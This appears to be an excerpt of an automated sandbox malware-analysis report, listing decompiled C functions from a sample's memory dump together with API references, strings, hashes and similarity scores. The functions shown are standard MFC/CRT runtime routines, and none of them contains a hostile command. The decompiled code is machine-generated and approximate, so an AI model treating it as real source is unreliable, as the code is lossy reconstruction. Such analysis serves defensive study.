                  • Instruction Fuzzy Hash: EC01A731640600AFE7256B21DC4DF9B76ACFBD4704F10052EF085922A1E664E891C669
                  Uniqueness

                  Uniqueness Score: 0.58%

                  C-Code - Quality: 41%
                  			E00428397(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t10;
                  				intOrPtr _t13;
                  				intOrPtr _t23;
                  				void* _t25;
                  
                  				_push(0xc);
                  				_push(0x447b38);
                  				_t8 = E00429338(__ebx, __edi, __esi);
                  				_t23 =  *((intOrPtr*)(_t25 + 8));
                  				if(_t23 == 0) {
                  					L9:
                  					return E0042937D(_t8);
                  				}
                  				if( *0x451924 != 3) {
                  					_push(_t23);
                  					L7:
                  					_t8 = HeapFree( *0x45024c, 0, ??);
                  					_t31 = _t8;
                  					if(_t8 == 0) {
                  						_t10 = E00429429(_t31);
                  						 *_t10 = E004293E7(GetLastError());
                  					}
                  					goto L9;
                  				}
                  				E0042EACE(__ebx, 4);
                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                  				_t13 = E0042EB01(_t23);
                  				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                  				if(_t13 != 0) {
                  					_push(_t23);
                  					_push(_t13);
                  					E0042EB31();
                  				}
                  				 *(_t25 - 4) = 0xfffffffe;
                  				_t8 = E004283ED();
                  				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                  					goto L9;
                  				} else {
                  					_push( *((intOrPtr*)(_t25 + 8)));
                  					goto L7;
                  				}
                  			}








                  APIs
                  • __lock.LIBCMT ref: 004283B5
                    • Part of subcall function 0042EACE: __mtinitlocknum.LIBCMT ref: 0042EAE4
                    • Part of subcall function 0042EACE: __amsg_exit.LIBCMT ref: 0042EAF0
                    • Part of subcall function 0042EACE: EnterCriticalSection.KERNEL32(?,?,?,00430446,00000004,00447EC8,0000000C,004313E6,8007000E,?,00000000,00000000,00000000,?,0042C30C,00000001), ref: 0042EAF8
                  • ___sbh_find_block.LIBCMT ref: 004283C0
                  • ___sbh_free_block.LIBCMT ref: 004283CF
                  • HeapFree.KERNEL32(00000000,8007000E,00447B38), ref: 004283FF
                  • GetLastError.KERNEL32(?,00430446,00000004,00447EC8,0000000C,004313E6,8007000E,?,00000000,00000000,00000000,?,0042C30C,00000001,00000214), ref: 00428410
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 2714421763-0
                  • Opcode ID: 4a0ae1f230bfdf4cb4b700a67d22753b74f7cce4a4be136bfb0388f71fbc42e9
                  • Instruction ID: 8a61b73c84332c3ff3313b341e7b1ee2e10918b1382162b7dde692dc9be26f67
                  • Opcode Fuzzy Hash: 4a0ae1f230bfdf4cb4b700a67d22753b74f7cce4a4be136bfb0388f71fbc42e9
                  • Instruction Fuzzy Hash: 97018831A02332ABDB20BB72BC0A75E7754AF00714F90411FF554661D2DF3D9941CA9D
                  Uniqueness

                  Uniqueness Score: 0.08%

                  C-Code - Quality: 100%
                  			E0041F65C(long* __ecx) {
                  				intOrPtr _t4;
                  				long _t5;
                  				void* _t6;
                  				void* _t13;
                  				intOrPtr _t14;
                  				long* _t15;
                  
                  				_t15 = __ecx;
                  				_t4 =  *((intOrPtr*)(__ecx + 0x14));
                  				if(_t4 != 0) {
                  					do {
                  						_t14 =  *((intOrPtr*)(_t4 + 4));
                  						E0041F4A6(__ecx, _t4, 0);
                  						_t4 = _t14;
                  					} while (_t14 != 0);
                  				}
                  				_t5 =  *_t15;
                  				if(_t5 != 0xffffffff) {
                  					TlsFree(_t5);
                  				}
                  				_t6 = _t15[4];
                  				if(_t6 != 0) {
                  					_t13 = GlobalHandle(_t6);
                  					GlobalUnlock(_t13);
                  					_t6 = GlobalFree(_t13);
                  				}
                  				DeleteCriticalSection( &(_t15[7]));
                  				return _t6;
                  			}

                  APIs
                  • TlsFree.KERNEL32(?,?,?,0041F6C2), ref: 0041F684
                  • GlobalHandle.KERNEL32(?), ref: 0041F692
                  • GlobalUnlock.KERNEL32(00000000,?,?,0041F6C2), ref: 0041F69B
                  • GlobalFree.KERNEL32(00000000), ref: 0041F6A2
                  • DeleteCriticalSection.KERNEL32(?,?,?,0041F6C2), ref: 0041F6AC
                    • Part of subcall function 0041F4A6: EnterCriticalSection.KERNEL32(?), ref: 0041F505
                    • Part of subcall function 0041F4A6: LeaveCriticalSection.KERNEL32(?,?), ref: 0041F515
                    • Part of subcall function 0041F4A6: LocalFree.KERNEL32(?), ref: 0041F51E
                    • Part of subcall function 0041F4A6: TlsSetValue.KERNEL32(?,00000000), ref: 0041F530
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                  • String ID:
                  • API String ID: 1549993015-0
                  • Opcode ID: 4694f139a3858295dad6e7ed2df73345daba2a417a8b32e9933219b7dc19dac3
                  • Instruction ID: f63cb34b95f37eb13b6fd49b4fa72bdfaccb7d5bba2307145e3ab085466c47aa
                  • Opcode Fuzzy Hash: 4694f139a3858295dad6e7ed2df73345daba2a417a8b32e9933219b7dc19dac3
                  • Instruction Fuzzy Hash: A0F089722405005BC7209B7CAC4CEAB36A9AFD97617190639F855D3360CB39DC57876D
                  Uniqueness

                  Uniqueness Score: 0.28%

                  C-Code - Quality: 69%
                  			E0041A00F(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				intOrPtr* _v20;
                  				signed int _v24;
                  				intOrPtr* _v28;
                  				signed int _v32;
                  				struct tagRECT _v48;
                  				struct tagRECT _v64;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t181;
                  				intOrPtr _t182;
                  				intOrPtr _t185;
                  				signed char _t187;
                  				intOrPtr* _t189;
                  				signed char _t193;
                  				signed int _t196;
                  				intOrPtr* _t210;
                  				intOrPtr _t213;
                  				intOrPtr* _t214;
                  				signed int _t224;
                  				signed int _t231;
                  				intOrPtr* _t233;
                  				void* _t244;
                  				signed int _t258;
                  				signed int _t264;
                  				signed int _t273;
                  				signed int _t276;
                  				signed int _t278;
                  				intOrPtr* _t281;
                  				intOrPtr _t282;
                  				intOrPtr* _t286;
                  				void* _t290;
                  				signed int _t291;
                  				intOrPtr* _t293;
                  
                  				_t281 = _a4;
                  				_push(0);
                  				_t233 = __ecx;
                  				_push(0);
                  				_push(0x418);
                  				_v8 = 0;
                  				 *_t281 = 0;
                  				 *((intOrPtr*)(_t281 + 4)) = 0;
                  				 *((intOrPtr*)( *__ecx + 0x118))();
                  				_v16 = 0;
                  				if(0 != 0) {
                  					_t276 = 0x14;
                  					_t277 = 0 * _t276 >> 0x20;
                  					_t185 = E0040B71F(0,  ~0x00BADBAD | 0 * _t276);
                  					_t290 = 0;
                  					_v8 = _t185;
                  					if(_v16 > 0) {
                  						_t282 = _t185;
                  						do {
                  							E00418DC4(_t233, _t290, _t282);
                  							_t290 = _t290 + 1;
                  							_t282 = _t282 + 0x14;
                  						} while (_t290 < _v16);
                  						_t291 = _v16;
                  						_t281 = _a4;
                  						_t244 = 0;
                  						if(_t291 > 0) {
                  							_t187 =  *(_t233 + 0x84);
                  							if((_t187 & 0x00000002) == 0) {
                  								_t277 = _t187 & 0x00000004;
                  								if((_t187 & 0x00000004) == 0) {
                  									L20:
                  									asm("sbb eax, eax");
                  									_push(_t244);
                  									_t224 =  ~(_a8 & 2) & 0x00007fff;
                  									__eflags = _t224;
                  									_push(_t224);
                  								} else {
                  									if((_a8 & 0x00000004) == 0) {
                  										__eflags = _a8 & 0x00000008;
                  										if((_a8 & 0x00000008) == 0) {
                  											__eflags = _a8 & 0x00000010;
                  											if((_a8 & 0x00000010) == 0) {
                  												__eflags = _a12 - 0xffffffff;
                  												if(_a12 == 0xffffffff) {
                  													__eflags = _t187 & 0x00000001;
                  													if((_t187 & 0x00000001) != 0) {
                  														goto L8;
                  													} else {
                  														goto L20;
                  													}
                  												} else {
                  													SetRectEmpty( &_v48);
                  													 *((intOrPtr*)( *_t233 + 0x148))( &_v48, _a8 & 0x00000002);
                  													_t231 = _a8 & 0x00000020;
                  													__eflags = _t231;
                  													if(_t231 == 0) {
                  														_t273 = _v48.right - _v48.left;
                  														__eflags = _t273;
                  													} else {
                  														_t273 = _v48.bottom - _v48.top;
                  													}
                  													_push(_t231);
                  													_t244 = _t273 + _a12;
                  													goto L13;
                  												}
                  											} else {
                  												_push(0);
                  												L13:
                  												_push(_t244);
                  											}
                  										} else {
                  											_push(0);
                  											_push(0x7fff);
                  										}
                  									} else {
                  										L8:
                  										_push(_t244);
                  										_push( *((intOrPtr*)(_t233 + 0x70)));
                  									}
                  								}
                  								_push(_t291);
                  								_push(_v8);
                  								E0041978A(_t233, _t277);
                  							}
                  							_t189 = E00419658(_t233,  &(_v48.right), _v8, _t291);
                  							 *_t281 =  *_t189;
                  							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
                  							if((_a8 & 0x00000040) != 0) {
                  								_v24 = 0;
                  								_a12 = 0;
                  								_v48.bottom =  *((intOrPtr*)(_t233 + 0xa4));
                  								 *((intOrPtr*)(_t233 + 0xa4)) = 0;
                  								if(_t291 > 0) {
                  									_t210 = _v8 + 4;
                  									_v28 = _t210;
                  									_t258 = _t291;
                  									do {
                  										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
                  											_a12 = _a12 + 1;
                  										}
                  										_t210 = _t210 + 0x14;
                  										_t258 = _t258 - 1;
                  									} while (_t258 != 0);
                  									_t314 = _a12 - _t258;
                  									if(_a12 > _t258) {
                  										_t278 = 0x18;
                  										_t213 = E0040B71F(_t314,  ~(_t258 & 0xffffff00 | _t314 > 0x00000000) | _a12 * _t278);
                  										_t73 = _t213 + 8; // 0x8
                  										_t286 = _t73;
                  										_v24 = _t213;
                  										_t214 = _v28;
                  										_v32 = _a12;
                  										_t264 = 0;
                  										_a12 = 0;
                  										_v12 = 0;
                  										_v20 = _t286;
                  										_v28 = _t214;
                  										while(1) {
                  											_t277 = _v32;
                  											if(_a12 >= _v32) {
                  												break;
                  											}
                  											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
                  												 *((intOrPtr*)(_t286 - 8)) = _t264;
                  												_t277 =  &_v64;
                  												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
                  												 *((intOrPtr*)( *_t233 + 0x184))(_t264,  &_v64);
                  												E0041453D(_t233,  &_v64);
                  												_a12 = _a12 + 1;
                  												_v20 = _v20 + 0x18;
                  												_t264 = _v12;
                  												_t214 = _v28;
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t286 = _v20;
                  											}
                  											_t264 = _t264 + 1;
                  											_t214 = _t214 + 0x14;
                  											_v12 = _t264;
                  											_v28 = _t214;
                  											if(_t264 < _v16) {
                  												continue;
                  											}
                  											break;
                  										}
                  										_t291 = _v16;
                  										_t281 = _a4;
                  									}
                  								}
                  								_t193 =  *(_t233 + 0x84);
                  								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
                  									 *((intOrPtr*)(_t233 + 0x70)) =  *_t281;
                  								}
                  								_v12 = _v12 & 0x00000000;
                  								_t323 = _t291;
                  								if(_t291 > 0) {
                  									_v20 = _v8;
                  									do {
                  										E00419453(_t233, _t277, _t323, _v12, _v20);
                  										_v12 = _v12 + 1;
                  										_v20 = _v20 + 0x14;
                  									} while (_v12 < _t291);
                  								}
                  								if(_a12 > 0) {
                  									_t293 = _v24 + 8;
                  									_v20 = _t293;
                  									do {
                  										_t196 = E00411CF8(_t233,  *((intOrPtr*)(_t293 - 4)));
                  										_v32 = _t196;
                  										if(_t196 != 0) {
                  											GetWindowRect( *(_t196 + 0x20),  &_v64);
                  											 *((intOrPtr*)( *_t233 + 0x184))( *((intOrPtr*)(_v20 - 8)),  &_v64);
                  											E00411EB6(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
                  											_t293 = _v20;
                  											_t281 = _a4;
                  										}
                  										_t293 = _t293 + 0x18;
                  										_t142 =  &_a12;
                  										 *_t142 = _a12 - 1;
                  										_t329 =  *_t142;
                  										_v20 = _t293;
                  									} while ( *_t142 != 0);
                  									E0040B74E(_t233, _t281, _t293, _t329, _v24);
                  								}
                  								 *((intOrPtr*)(_t233 + 0xa4)) = _v48.bottom;
                  							}
                  							E0040B74E(_t233, _t281, _t291, _t329, _v8);
                  						}
                  					}
                  				}
                  				SetRectEmpty( &_v64);
                  				 *((intOrPtr*)( *_t233 + 0x148))( &_v64, _a8 & 0x00000002);
                  				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
                  				 *_t281 =  *_t281 + _v64.left - _v64.right;
                  				E004230B9( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
                  				_t181 =  *_t281;
                  				if(_t181 <= _v48.right) {
                  					_t181 = _v48.right;
                  				}
                  				 *_t281 = _t181;
                  				_t182 =  *((intOrPtr*)(_t281 + 4));
                  				if(_t182 <= _v48.bottom) {
                  					_t182 = _v48.bottom;
                  				}
                  				 *((intOrPtr*)(_t281 + 4)) = _t182;
                  				return _t281;
                  			}

                  APIs
                  • SetRectEmpty.USER32(?), ref: 0041A307
                    • Part of subcall function 0040B71F: _malloc.LIBCMT ref: 0040B73D
                  • GetWindowRect.USER32(?,?), ref: 0041A293
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$EmptyWindow_malloc
                  • String ID: @
                  • API String ID: 299164714-2766056989
                  • Opcode ID: 4e5ed2f8dcf97cb333e15d5cb4c4fdfa0d96c0b39d02aad18ff642e128fbc00e
                  • Instruction ID: eff8511468f97fe2a931a56d27c0a9ee7776252130c533f1be4d45fbb75153f4
                  • Opcode Fuzzy Hash: 4e5ed2f8dcf97cb333e15d5cb4c4fdfa0d96c0b39d02aad18ff642e128fbc00e
                  • Instruction Fuzzy Hash: 3CC17D71901209AFCF18CFA8C984AEEBBB5FF48314F14856AE815EB351D738AD50CB55
                  Uniqueness

                  Uniqueness Score: 23.02%

                  C-Code - Quality: 75%
                  			E00410FD1(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				char _v48;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr* _t33;
                  				intOrPtr* _t35;
                  				intOrPtr* _t36;
                  				void* _t38;
                  				intOrPtr* _t52;
                  				void* _t54;
                  				intOrPtr _t55;
                  				void* _t58;
                  				void* _t60;
                  				intOrPtr _t62;
                  
                  				_t62 = E00420285(_t54, _t58, _t60, __eflags) + 0x7c;
                  				_t55 =  *((intOrPtr*)(E0042083D(_t54, _t58, _t62, __eflags) + 8));
                  				if(_a8 != 0 || _a12 != 0) {
                  					L4:
                  					_v8 =  *((intOrPtr*)(E00429429(__eflags)));
                  					_t33 = E00429429(__eflags);
                  					_push(_a16);
                  					 *_t33 = 0;
                  					_push(_a12);
                  					_push(_a8);
                  					_push(_a4);
                  					E00427E7D(_t62, 0x60, 0x5f, L"Afx:%p:%x:%p:%p:%p", _t55);
                  					goto L5;
                  				} else {
                  					_t69 = _a16;
                  					if(_a16 != 0) {
                  						goto L4;
                  					}
                  					_v8 =  *((intOrPtr*)(E00429429(_t69)));
                  					_t52 = E00429429(_t69);
                  					_push(_a4);
                  					 *_t52 = 0;
                  					E00427E7D(_t62, 0x60, 0x5f, L"Afx:%p:%x", _t55);
                  					L5:
                  					_t35 = E00429429(_t69);
                  					_t70 =  *_t35;
                  					if( *_t35 == 0) {
                  						_t36 = E00429429(__eflags);
                  						_t57 = _v8;
                  						 *_t36 = _v8;
                  					} else {
                  						E0040B759( *((intOrPtr*)(E00429429(_t70))));
                  						_pop(_t57);
                  					}
                  					_push( &_v48);
                  					_push(_t62);
                  					_push(_t55);
                  					_t38 = E0040C953(_t55, _t57, 0, _t62, _t70);
                  					_t71 = _t38;
                  					if(_t38 == 0) {
                  						_v48 = _a4;
                  						_v44 = DefWindowProcW;
                  						_v28 = _a16;
                  						_v24 = _a8;
                  						_v20 = _a12;
                  						_push( &_v48);
                  						_v36 = 0;
                  						_v40 = 0;
                  						_v32 = _t55;
                  						_v16 = 0;
                  						_v12 = _t62;
                  						if(E00410F44(_t55, _t57, 0, _t62, _t71) == 0) {
                  							E0041414E(_t57);
                  						}
                  					}
                  					return _t62;
                  				}
                  			}

                  APIs
                  • __snwprintf_s.LIBCMT ref: 0041101E
                    • Part of subcall function 00427E7D: __vsnwprintf_s_l.LIBCMT ref: 00427E94
                  • __snwprintf_s.LIBCMT ref: 00411050
                    • Part of subcall function 00429429: __getptd_noexit.LIBCMT ref: 00429429
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __snwprintf_s$__getptd_noexit__vsnwprintf_s_l
                  • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                  • API String ID: 1951015-2801496823
                  • Opcode ID: 54a190a122e10ae168ca5fd04d243db42ad2f5ff21ef308a8c051c5547ccc26a
                  • Instruction ID: 8fd3248657fc5f0192a08c4b4491cf54d6ca9dc0f292adc27a3eb095036314c2
                  • Opcode Fuzzy Hash: 54a190a122e10ae168ca5fd04d243db42ad2f5ff21ef308a8c051c5547ccc26a
                  • Instruction Fuzzy Hash: 3A316D75E00219AFCB11EFA6D8419DE7BF4EF48354F10405BF904A7261D7388E81CBA9
                  Uniqueness

                  Uniqueness Score: 1.40%

                  C-Code - Quality: 90%
                  			E0040F712(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				struct HINSTANCE__* _t16;
                  				_Unknown_base(*)()* _t17;
                  				void* _t25;
                  				void* _t26;
                  				void* _t27;
                  
                  				_t27 = __eflags;
                  				_t24 = __edi;
                  				_t21 = __ebx;
                  				E00420C0D(0xc);
                  				_push(E0040EA0B);
                  				_t26 = E0041F075(__ebx, 0x44f740, __edi, _t25, _t27);
                  				if(_t26 == 0) {
                  					E00413DD0(0x44f740);
                  				}
                  				_t29 =  *(_t26 + 8);
                  				if( *(_t26 + 8) != 0) {
                  					L7:
                  					E00420C7F(0xc);
                  					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
                  				} else {
                  					_push("hhctrl.ocx");
                  					_t16 = E0040CBC1(_t21, 0x44f740, _t24, _t26, _t29);
                  					 *(_t26 + 4) = _t16;
                  					if(_t16 != 0) {
                  						_t17 = GetProcAddress(_t16, "HtmlHelpW");
                  						 *(_t26 + 8) = _t17;
                  						__eflags = _t17;
                  						if(_t17 != 0) {
                  							goto L7;
                  						}
                  						FreeLibrary( *(_t26 + 4));
                  						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                  					}
                  					return 0;
                  				}
                  			}

                  APIs
                    • Part of subcall function 00420C0D: EnterCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C47
                    • Part of subcall function 00420C0D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C59
                    • Part of subcall function 00420C0D: LeaveCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C66
                    • Part of subcall function 00420C0D: EnterCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C76
                    • Part of subcall function 0041F075: __EH_prolog3_catch.LIBCMT ref: 0041F07C
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • GetProcAddress.KERNEL32(00000000,HtmlHelpW,0040EA0B,0000000C), ref: 0040F75B
                  • FreeLibrary.KERNEL32(?), ref: 0040F76B
                  Strings
                  Similarity
                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                  • String ID: HtmlHelpW$hhctrl.ocx
                  • API String ID: 3274081130-3773518134
                  • Opcode ID: 0276318da37915d07d7c66a566c50b1d2222781f9b0da7236551b5ee8244edf6
                  • Instruction ID: 909925c40f10d25c4794f9c64542dff84bc4929cb96c29a27cb9ec2024979570
                  • Opcode Fuzzy Hash: 0276318da37915d07d7c66a566c50b1d2222781f9b0da7236551b5ee8244edf6
                  • Instruction Fuzzy Hash: E9012631100702EBDB312F72EC46F573A90AF04755F10843BF49AA25E1DB79D451861E
                  Uniqueness

                  Uniqueness Score: 0.53%

                  C-Code - Quality: 93%
                  			E00425E9F(void* __ebx, void** __ecx, intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _t7;
                  				void* _t8;
                  				signed int _t13;
                  				long _t21;
                  				void** _t25;
                  
                  				_t7 = _a8;
                  				_t25 = __ecx;
                  				_t21 = _t7 + 0x40;
                  				 *((intOrPtr*)(__ecx + 4)) = _t7;
                  				if(_t21 >= _t7) {
                  					_t8 = GlobalAlloc(0x40, _t21);
                  					 *_t25 = _t8;
                  					if(_t8 == 0) {
                  						goto L1;
                  					}
                  					_t23 = GlobalLock(_t8);
                  					E00402850(__ebx, _t10, _t25[1], _a4, _t25[1]);
                  					_t13 = E00425D35(_t23);
                  					asm("sbb eax, eax");
                  					_t25[2] =  ~_t13 + 1;
                  					GlobalUnlock( *_t25);
                  					return 1;
                  				}
                  				L1:
                  				return 0;
                  			}

                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?,?,>A,004260FC,?,00000000,?,?,0041EB3E,?), ref: 00425EBB
                  • GlobalLock.KERNEL32(00000000,?,?,?,0041EB3E,?), ref: 00425EC9
                  • GlobalUnlock.KERNEL32(?,?,?,?,0041EB3E,?), ref: 00425EF2
                  Strings
                  Similarity
                  • API ID: Global$AllocLockUnlock
                  • String ID: >A
                  • API String ID: 3972497268-3365779530
                  • Opcode ID: 94320e67f56ae1a6fe06acc3c7dd77b21b852c05708a594bee5dcca8a3e26e16
                  • Instruction ID: 74a23d57ff3a46489a0a0e84a5dd4c4c660dcbd5efac16b9910f5479af4a46cb
                  • Opcode Fuzzy Hash: 94320e67f56ae1a6fe06acc3c7dd77b21b852c05708a594bee5dcca8a3e26e16
                  • Instruction Fuzzy Hash: 33F0C2B2650211AFC711AFB4DC08D6B7BECEF58711351483AF9AAD3240EA38D8118B65
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 65%
                  			E00432116() {
                  				signed long long _v12;
                  				signed int _v20;
                  				signed long long _v28;
                  				signed char _t8;
                  
                  				_t8 = GetModuleHandleA("KERNEL32");
                  				if(_t8 == 0) {
                  					L6:
                  					_v20 =  *0x4421d8;
                  					_v28 =  *0x4421d0;
                  					asm("fsubr qword [ebp-0x18]");
                  					_v12 = _v28 / _v20 * _v20;
                  					asm("fld1");
                  					asm("fcomp qword [ebp-0x8]");
                  					asm("fnstsw ax");
                  					if((_t8 & 0x00000005) != 0) {
                  						return 0;
                  					} else {
                  						return 1;
                  					}
                  				} else {
                  					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                  					if(__eax == 0) {
                  						goto L6;
                  					} else {
                  						_push(0);
                  						return __eax;
                  					}
                  				}
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,004291FD), ref: 0043211B
                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0043212B
                  Strings
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: IsProcessorFeaturePresent$KERNEL32
                  • API String ID: 1646373207-3105848591
                  • Opcode ID: 5844c4ce1de15e9ba150b8fdf7a60626d9ecf47f5f533f0d3825c22c3fc58a24
                  • Instruction ID: 66d580759a2fd630468160295ed2e2150cd1eb365c4381919f92f88f5018e7ac
                  • Opcode Fuzzy Hash: 5844c4ce1de15e9ba150b8fdf7a60626d9ecf47f5f533f0d3825c22c3fc58a24
                  • Instruction Fuzzy Hash: CAF0B430A00A09D2EF001BA0BF0E76FBA79BB94746F920491E7D2B00D4CFB480B5D24A
                  Uniqueness

                  Uniqueness Score: 0.06%

                  C-Code - Quality: 75%
                  			E00437EC5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _v0;
                  				signed int _v4;
                  				char _v40;
                  				char _v80;
                  				char* _t21;
                  				char* _t25;
                  				void* _t31;
                  
                  				_t31 = __eflags;
                  				_push(0x44);
                  				E0042922B(E00439A0F, __ebx, __edi, __esi);
                  				E00408A20( &_v40, "invalid string position");
                  				_v4 = _v4 & 0x00000000;
                  				_t21 =  &_v80;
                  				E00437E3E(_t21,  &_v40);
                  				E00428ED5( &_v80, 0x448110);
                  				asm("int3");
                  				_push(__esi);
                  				_t25 = _t21;
                  				 *((intOrPtr*)(_t25 + 0x18)) = 0xf;
                  				E00408DC0(_t21, _t31, 0);
                  				E00408C60(__ebx, _t25, __edi, _t25, _v0, 0, 0xffffffff);
                  				return _t25;
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00437ECC
                  • std::bad_exception::bad_exception.LIBCMT ref: 00437EE9
                    • Part of subcall function 00437E3E: std::runtime_error::runtime_error.LIBCPMT ref: 00437E49
                  • __CxxThrowException@8.LIBCMT ref: 00437EF7
                    • Part of subcall function 00428ED5: RaiseException.KERNEL32(?,?,?,?), ref: 00428F17
                  Strings
                  • invalid string position, xrefs: 00437ED1
                  Similarity
                  • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                  • String ID: invalid string position
                  • API String ID: 3299838469-1799206989
                  • Opcode ID: 86f948425f2300e48e03700dace2c7665851589c99c4ce9821580b47612a4d89
                  • Instruction ID: 908dc1ecdf1ded5c626d21bc0831b332bb93afbee8c4c5363dc60e2b42354bcc
                  • Opcode Fuzzy Hash: 86f948425f2300e48e03700dace2c7665851589c99c4ce9821580b47612a4d89
                  • Instruction Fuzzy Hash: BAF05E71A10228BADB10BAD5CC16FDE76689F18B24F20052FB210B61C2CEB85D0487AC
                  Uniqueness

                  Uniqueness Score: 0.10%

                  C-Code - Quality: 37%
                  			E0041C636(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
                  				signed int _v8;
                  				char _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				char _v544;
                  				intOrPtr _v548;
                  				RECT* _v552;
                  				struct tagRECT _v568;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t58;
                  				signed char _t65;
                  				signed int _t70;
                  				intOrPtr _t107;
                  				intOrPtr _t108;
                  				signed int _t113;
                  				signed int _t115;
                  				intOrPtr _t133;
